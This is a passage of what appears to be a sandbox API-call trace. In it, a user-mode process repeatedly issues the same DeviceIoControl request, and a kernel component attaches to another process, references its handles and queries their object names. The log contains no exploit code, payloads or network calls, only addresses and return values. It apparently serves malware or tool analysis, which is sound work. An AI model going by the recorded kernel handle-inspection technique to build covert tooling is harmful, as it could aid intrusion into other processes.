ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.889] ObfDereferenceObject (Object=0xfffffa80036ea070) returned 0x2 [0244.889] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.890] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.890] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.890] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0244.890] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.890] PsAcquireProcessExitSynchronization () returned 0x0 [0244.890] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.890] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036e9730, HandleInformation=0x0) returned 0x0 [0244.890] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.890] PsReleaseProcessExitSynchronization () returned 0x2 [0244.890] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.890] ObQueryNameString (in: Object=0xfffffa80036e9730, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.890] ObfDereferenceObject (Object=0xfffffa80036e9730) returned 0x2 [0244.890] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.890] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.890] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.890] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.890] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.890] PsAcquireProcessExitSynchronization () returned 0x0 [0244.890] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.890] ObReferenceObjectByHandle (in: Handle=0x4d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375a070, HandleInformation=0x0) returned 0x0 [0244.890] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.890] PsReleaseProcessExitSynchronization () returned 0x2 [0244.890] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.890] ObQueryNameString (in: Object=0xfffffa800375a070, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.890] ObfDereferenceObject (Object=0xfffffa800375a070) returned 0x2 [0244.890] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.891] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.891] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.891] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.891] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.891] PsAcquireProcessExitSynchronization () returned 0x0 [0244.891] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.891] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375a300, HandleInformation=0x0) returned 0x0 [0244.891] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.891] PsReleaseProcessExitSynchronization () returned 0x2 [0244.891] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.891] ObQueryNameString (in: Object=0xfffffa800375a300, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.891] ObfDereferenceObject (Object=0xfffffa800375a300) returned 0x2 [0244.891] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.891] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.891] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.891] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0244.891] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.891] PsAcquireProcessExitSynchronization () returned 0x0 [0244.891] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.891] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800387a3c0, HandleInformation=0x0) returned 0x0 [0244.891] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.891] PsReleaseProcessExitSynchronization () returned 0x2 [0244.891] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.891] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.891] ObfDereferenceObject (Object=0xfffffa800387a3c0) returned 0x1 [0244.891] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.892] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.892] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.892] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x100, lpOverlapped=0x0) returned 1 [0244.892] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.892] PsAcquireProcessExitSynchronization () returned 0x0 [0244.892] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.892] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010689f0, HandleInformation=0x0) returned 0x0 [0244.892] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.892] PsReleaseProcessExitSynchronization () returned 0x2 [0244.892] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.892] ObQueryNameString (in: Object=0xfffff8a0010689f0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.892] ObfDereferenceObject (Object=0xfffff8a0010689f0) returned 0x2 [0244.892] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.892] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.892] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.892] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0244.892] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.892] PsAcquireProcessExitSynchronization () returned 0x0 [0244.892] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.892] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00104cdb0, HandleInformation=0x0) returned 0x0 [0244.892] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.892] PsReleaseProcessExitSynchronization () returned 0x2 [0244.892] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.892] ObQueryNameString (in: Object=0xfffff8a00104cdb0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.893] ObfDereferenceObject (Object=0xfffff8a00104cdb0) returned 0x3 [0244.893] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.893] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.893] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.893] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0244.893] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.893] PsAcquireProcessExitSynchronization () returned 0x0 [0244.893] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.893] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00104cdb0, HandleInformation=0x0) returned 0x0 [0244.893] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.893] PsReleaseProcessExitSynchronization () returned 0x2 [0244.893] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.893] ObQueryNameString (in: Object=0xfffff8a00104cdb0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.893] ObfDereferenceObject (Object=0xfffff8a00104cdb0) returned 0x3 [0244.893] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.893] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.893] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.893] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x100, lpOverlapped=0x0) returned 1 [0244.893] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.893] PsAcquireProcessExitSynchronization () returned 0x0 [0244.893] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.893] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00104ccf0, HandleInformation=0x0) returned 0x0 [0244.893] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.893] PsReleaseProcessExitSynchronization () returned 0x2 [0244.893] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.893] ObQueryNameString (in: Object=0xfffff8a00104ccf0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.894] ObfDereferenceObject (Object=0xfffff8a00104ccf0) returned 0x2 [0244.894] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.894] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.894] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.894] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0244.894] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.894] PsAcquireProcessExitSynchronization () returned 0x0 [0244.894] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.894] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800373b070, HandleInformation=0x0) returned 0x0 [0244.894] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.894] PsReleaseProcessExitSynchronization () returned 0x2 [0244.894] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.894] ObQueryNameString (in: Object=0xfffffa800373b070, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.894] ObfDereferenceObject (Object=0xfffffa800373b070) returned 0x3 [0244.894] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.894] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.894] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.894] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0244.894] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.894] PsAcquireProcessExitSynchronization () returned 0x0 [0244.894] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.894] ObReferenceObjectByHandle (in: Handle=0x68c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003943330, HandleInformation=0x0) returned 0x0 [0244.894] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.894] PsReleaseProcessExitSynchronization () returned 0x2 [0244.894] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.894] ObQueryNameString (in: Object=0xfffffa8003943330, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.894] ObfDereferenceObject (Object=0xfffffa8003943330) returned 0x2 [0244.895] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.895] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.895] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.895] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0244.895] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.895] PsAcquireProcessExitSynchronization () returned 0x0 [0244.895] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.895] ObReferenceObjectByHandle (in: Handle=0x6f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00126e1d0, HandleInformation=0x0) returned 0x0 [0244.895] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.895] PsReleaseProcessExitSynchronization () returned 0x2 [0244.895] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.895] ObQueryNameString (in: Object=0xfffff8a00126e1d0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.895] ObfDereferenceObject (Object=0xfffff8a00126e1d0) returned 0x2 [0244.895] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.895] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.895] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.895] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0244.895] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.895] PsAcquireProcessExitSynchronization () returned 0x0 [0244.895] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.895] ObReferenceObjectByHandle (in: Handle=0x6f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c01b00, HandleInformation=0x0) returned 0x0 [0244.895] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.895] PsReleaseProcessExitSynchronization () returned 0x2 [0244.895] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.895] ObQueryNameString (in: Object=0xfffff8a000c01b00, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.895] ObfDereferenceObject (Object=0xfffff8a000c01b00) returned 0x3 [0244.895] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.896] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.896] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.896] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0244.896] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.896] PsAcquireProcessExitSynchronization () returned 0x0 [0244.896] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.896] ObReferenceObjectByHandle (in: Handle=0x788, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a1cdd0, HandleInformation=0x0) returned 0x0 [0244.896] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.896] PsReleaseProcessExitSynchronization () returned 0x2 [0244.896] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.896] ObQueryNameString (in: Object=0xfffffa8003a1cdd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.896] ObfDereferenceObject (Object=0xfffffa8003a1cdd0) returned 0x1 [0244.896] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.896] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.896] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.896] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0244.896] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.896] PsAcquireProcessExitSynchronization () returned 0x0 [0244.896] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.896] ObReferenceObjectByHandle (in: Handle=0x7b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a18730, HandleInformation=0x0) returned 0x0 [0244.896] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.896] PsReleaseProcessExitSynchronization () returned 0x2 [0244.896] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.896] ObQueryNameString (in: Object=0xfffffa8003a18730, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.896] ObfDereferenceObject (Object=0xfffffa8003a18730) returned 0x1 [0244.896] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.896] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.896] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.896] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0244.897] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.897] PsAcquireProcessExitSynchronization () returned 0x0 [0244.897] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.897] ObReferenceObjectByHandle (in: Handle=0x7d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a1cf20, HandleInformation=0x0) returned 0x0 [0244.897] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.897] PsReleaseProcessExitSynchronization () returned 0x2 [0244.897] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.897] ObQueryNameString (in: Object=0xfffffa8003a1cf20, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.897] ObfDereferenceObject (Object=0xfffffa8003a1cf20) returned 0x1 [0244.897] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.897] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.897] 